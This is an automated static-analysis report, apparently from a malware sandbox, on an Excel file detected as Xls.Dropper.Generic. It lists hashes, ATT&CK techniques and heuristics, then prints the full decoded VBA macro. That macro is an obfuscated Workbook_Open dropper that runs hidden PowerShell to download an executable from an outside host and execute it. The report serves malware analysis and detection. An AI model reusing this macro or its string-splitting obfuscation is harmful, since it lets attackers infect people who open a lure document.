Xls.Dropper.Generic-6595971-0 — Office (OLE) malware analysis

Static analysis result for SHA-256 333ce82ca7591c39…

MALICIOUS

Office (OLE)

Size: 48.5 KB
Created: 2009-02-14 12:31:57
Authoring application: Microsoft Excel
First seen: 2019-05-10
MD5: e3d4caf532d46083b590d28b21a2effb
SHA-1: fb65e518551a915fd3a4a6f304e3221e928601db
SHA-256: 333ce82ca7591c39a27be2ec07ea3e213e7876ee968d7d736733566883a160bc
Risk score: 180

Malware Insights

Xls.Dropper.Generic-6595971-0 · confidence 95%

MITRE ATT&CK
T1566.001 Spearphishing Attachment
T1203 Exploitation for Client Execution

The sample contains a Workbook_Open macro that uses the Shell() function to execute a PowerShell command. This command is constructed by concatenating several strings to form a URL and a filename for a second-stage executable. The macro attempts to download and execute this payload from 'http://monde.at/realst'. The Japanese text in the document body serves as a lure to encourage macro execution.

Heuristics (4)

  • ClamAV: Xls.Dropper.Generic-6595971-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Xls.Dropper.Generic-6595971-0
  • VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings)
    Document contains VBA macro code
  • Shell() call in VBA (critical, OLE_VBA_SHELL)
    Shell() call in VBA
  • Workbook_Open macro (high, OLE_VBA_WBOPEN)
    Workbook_Open macro

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 2508 bytes
SHA-256: b6b00bc53f056c7c4fbfbb432485b95c951d9fe0465641003eb92799fcbb858b
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Function sheetunderground()
sheetunderground = "sY`STe" + "m.Ne" + "t.`w`E" + "Bc" + "l`IE"
End Function
Function starsunfire()
Dim gardengrass As String
Randomize
gardengrass = Int(Rnd * 9437006#)
starsunfire = gardengrass
End Function
Function fabinachii()
fabinachii = "cm" + ffmulti + "c ""  PO" + "weRsH" + dellpacket & ostinmuffa + staloneumo + libocountries & picassoweb
End Function
Function ffmulti()
ffmulti = "d.e" + "Xe   /"
End Function
Function picassoweb()
inextimer = starsunfire
holeblackdeep = "'tp:'+'//'+'mo'+'nde.at/r'+'eal'+'st'),\""$lenovo\" + "\" + inextimer + ".e" + "xe\"")}wh"
fantaandcola = "ile(!$?);" + "&(\""{1}{0}{2}\""-f'ro','S" + "tart-P','cess') $LEnOvo\" + inextimer + ".e" + "XE"""""
picassoweb = holeblackdeep + fantaandcola
End Function
Function ostinmuffa()
ostinmuffa = "Fil  ""Sv bXzO9" + "1 ([tYPe](\""{2}" + "{1}{0}\""-F 'Me" + "nT','IroN','ENv'));  d" + "o{.(\""{1}{0}\"" -f'p','s" + "lee') 41;$lenovo =   (ge"
End Function
Function dellpacket()
dellpacket = "ElL -noLOGO  -NOeXIt -noNI" + "NTERAcTIV  -WInDO  hiDd" + "en  -EXecUt" + "ionP  bYpAss  -nOpRO"
End Function
Sub Workbook_Open()
Shell fabinachii, fmTabOrientationTop

End Sub
Function libocountries()
hawaiiposition = "nT" + ").\""d" + "o`" + "Wn"
libocountries = "3}{0" + "}{2}\"" -f'c" + "','Ne" + "w-O" + "bj" + "','t','e') " + sheetunderground + hawaiiposition + "LO" + "aDF`I`lE\"".\""iN`Vo" + "Ke\""(('ht'+"
End Function
Function staloneumo()
depodeposit = "e(('M" + "y'+'D"
staloneumo = "T-c" + "hil" + "D" + "IT" + "Em Va" + "R" + "iAB" + "le:bx" + "zo91  ).v" + "aL" + "Ue:" + ":(\""{2}{0" + "}{3}{1}\""-f 't" + "F','rP" + "ath','G" + "e','ol" + "de').Invok" + depodeposit + "o'+'cu'+'me'+'nts'));(.(\""{1}{"
End Function


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True